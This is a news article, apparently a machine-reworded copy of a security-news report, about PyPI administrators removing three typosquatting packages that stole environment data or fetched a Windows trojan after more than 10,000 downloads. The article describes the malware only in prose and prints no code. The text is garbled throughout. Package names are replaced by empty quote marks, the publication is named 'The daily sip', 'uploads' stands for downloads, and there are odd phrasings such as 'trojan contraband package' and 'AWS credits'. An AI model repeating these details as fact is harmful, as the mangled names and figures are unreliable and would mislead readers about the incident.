PyPI admins remove three malicious packages after 10,000+ downloads

Adam Bannister December 14, 2021 at 16:09 UTC

Updated: December 14, 2021 at 18:39 UTC

Two packages remained unknown for 10 months

UPDATE The Python Package Index (PyPI) has removed malware and data theft deployment packages that have been collectively downloaded thousands of times.

The trio of malicious packages tricked unsuspecting users into typing the names of legitimate packages.

‘Good reputation’

In the case of two packages that exfiltrated data from compromised systems, the number of downloads was also potentially inflated by the way the authors deceptively polished their credibility.

“Both of these packages included their source code URL as an existing popular library, so anyone browsing the package in PyPI or analyzing the popularity of the library would see a lot of GitHub stars and forks. which indicates a good reputation, ”said Andrew Scott, product manager at Palo Alto and maintainer of the Python Ochrona Security project, in a Medium blog post.

Uploaded by the same user, both packages – ” and ” – appeared to target users of Apache Mesos, which is used to manage computer clusters.

Keep up to date with the latest news on software supply chain attacks

They were uploaded to PyPI in February 2021, after which they’ve been uploaded over 10,000 times, including over 600 uploads in the last month alone.

Scott thanked the Python security team for removing the packages promptly on December 13, the same day he notified them.

A third trojan contraband package dubbed ” recorded around 600 downloads between the appearance on PyPI on December 1 and its removal when PyPI administrators were alerted on December 10.

“I think aws-login0tool was intended to confuse users of a tool called aws-login-tool which no longer exists on PyPI, but is found on some older mirrors,” Scott said. The daily sip.

“The dpp-client packages I have to assume may be [intended to imitate] an internal component of some sort of data processing pipeline tool, but I haven’t been able to confirm this. “

Malicious operations

All three packages were identified as potentially malicious through the import chain, “because this is commonly used to exfiltrate data or download malicious files,” Scott said.

The pair of data thieves gathered environment variables and lists of files, apparently looking for files related to Apache Mesos, and relayed them “to an unknown web service”.

The performed a standard package installation, before recovering a file from “any domain” and attempting to run the file, a known Windows Trojan.

“It’s hard to know what the impact would be,” Scott said. “The Trojan package would only be limited to malware capabilities and data mining will really depend on your environment – but I could definitely see that as being able to harvest things like AWS credits and other API keys.” . I’m less sure what Mesos specific information is stored in the targeted directories.

Python poll

The results emerged from a static analysis of around 200,000 PyPI packages – nearly two-thirds of the total – after uploading them with Bandersnatch.

He extracted the packages by creating “a Python script simple enough to recursively step through Bandersnatch’s somewhat complicated folder structure, then unzip and extract each sdist, egg, or wheel into a flat directory.”

“Once extracted, I ran a number of string and regular expression searches using grep and then manually reviewed the results,” Scott said.

This technique also discovered a minor vulnerability in an open source package developed by a commercial vendor.

Scott said that Ochrona, an open source software composition analysis tool, can help developers if they are using a mirror or want to check if packages are present in their project.

He also intends to update and refine his package analysis and will release additional results later.

This article was updated with an additional comment from Andrew Scott on December 14

DON’T FORGET TO READ “Log4Shell” vulnerability poses a critical threat to applications using the “ubiquitous” Apache Log4j Java logging package

Comments are closed.